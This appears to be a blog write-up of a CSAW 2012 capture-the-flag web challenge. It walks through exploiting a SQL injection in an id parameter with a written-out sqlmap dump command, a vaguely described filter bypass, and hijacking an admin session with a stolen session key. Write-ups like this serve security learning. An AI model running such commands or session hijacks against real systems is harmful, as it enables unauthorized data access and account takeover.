For this problem, we were given login
credentials and told the administrator has the key. After mapping the
application and trying some test inputs it was clear that there was a
SQL injection in the horse.php page for the id parameter, the errors were readily displayed. .
sqlmap made short work of dumping the
database structure
./sqlmap.py -u
http://128.238.66.217/horse.php?id=1 –dump-all
<...snip...>
Database: csaw_chal1
Table: sessions
[0 entries]
+---------+------------+---------+
| user_id | session_id | session |
+---------+------------+---------+
+---------+------------+---------+
<...snip...>
Database: csaw_chal1
Table: users
[0 entries]
+---------+------+-------+----------+----------+
| user_id | name | level | username |
password |
+---------+------+-------+----------+----------+
+---------+------+-------+----------+----------+
Unfortunately due to the “WAF” the
database contents weren't automatically dumped. After some manual
attempts a suitable bypass was found. The password hash for the
administrator user (Mr. Corgi) was retrieved from the users table. I let john attempt to
crack it for awhile while I finished off the reversing problems.
However after a hour or so the password wasn't cracked, so I looked at
impersonating the administrator. Fortunately in the sessions table
there was a active session for the admin user.
Using burp, I used the extracted
session key to impersonate the admin user, which produced the key.
Some other great write-ups on CSAW 2012.
http://eindbazen.net/
http://blog.lse.epita.fr/cat/writeups-csaw-ctf-2012-quals/
http://raidersec.blogspot.ca/2012/09/csaw-ctf-quals-2012-recon-1-3-writeup.html
Thanks again to the CSAW folks for putting this together.
No comments:
Post a Comment